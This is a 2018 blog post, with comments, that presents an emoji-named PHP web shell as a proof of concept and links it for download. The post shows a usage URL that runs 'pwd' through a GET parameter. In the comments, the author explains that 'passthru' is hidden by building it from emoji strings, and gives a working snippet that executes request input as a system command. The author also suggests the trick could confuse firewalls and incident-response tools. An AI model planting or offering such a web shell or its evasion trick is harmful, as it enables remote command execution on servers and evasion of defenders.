Monday, July 23, 2018

Creating an Emojis PHP WebShell


I recently came across an interesting behaviour on PHP. Apparently, PHP permits the usage of Unicode characters as variable names. Therefore, friendly emojis can be used as a PHP variable.


<?php
$😶="Hello World!";
echo($😶);


Output:
>> Hello World!
Which is valid.

I thought about making a fancy example of a PHP Web-Shell using emojis. This is made for entertainment purposes, no real advantage is gained by using Emojis webshell. It may disturb/confuse a WAF or back-end parser, but it’s not confirmed against a real-world environment.

Usage

Usage can be as:
https://example.com/emojis-webshell.php?👽=pwd


You can create a CLI for it to do more; I am only publishing it as a proof of concept.

Download


[Download] Emojis web-shell: [Link]


10 comments:

  1. Haha that is pretty fun. Could also break some IR tools that aren't ready to support Emoji/ASCII code.

    ReplyDelete
    Replies
    1. Yeah!
      I expect this too. I haven't tried it against security/incident response tools yet. I'm sure it will break the parsing of many.

      Delete
  2. This comment has been removed by the author.

    ReplyDelete
  3. Nice post!
    May I ask a question? Why do you run an `eval` with the result of a `passthru`?

    ReplyDelete
    Replies
    1. Thanks Lorenzo!
      The reason is: `passthru` is a command execution function. It's obfuscated using the emojis technique discussed.
      The `eval` is used to run the resulted PHP code.

      Delete
    2. I know `passthru` is a string created concatenating the emojis. Does PHP execute the `passthru` even without the `eval` command?

      Delete
    3. @Lorenzo
      Yes, PHP can execute it without `eval`.

      ```
      if (isset($_GET['👽'])) {
      $😭($_GET['👽']);
      };
      ```

      Will work normally too.

      Delete
  4. This comment has been removed by the author.

    ReplyDelete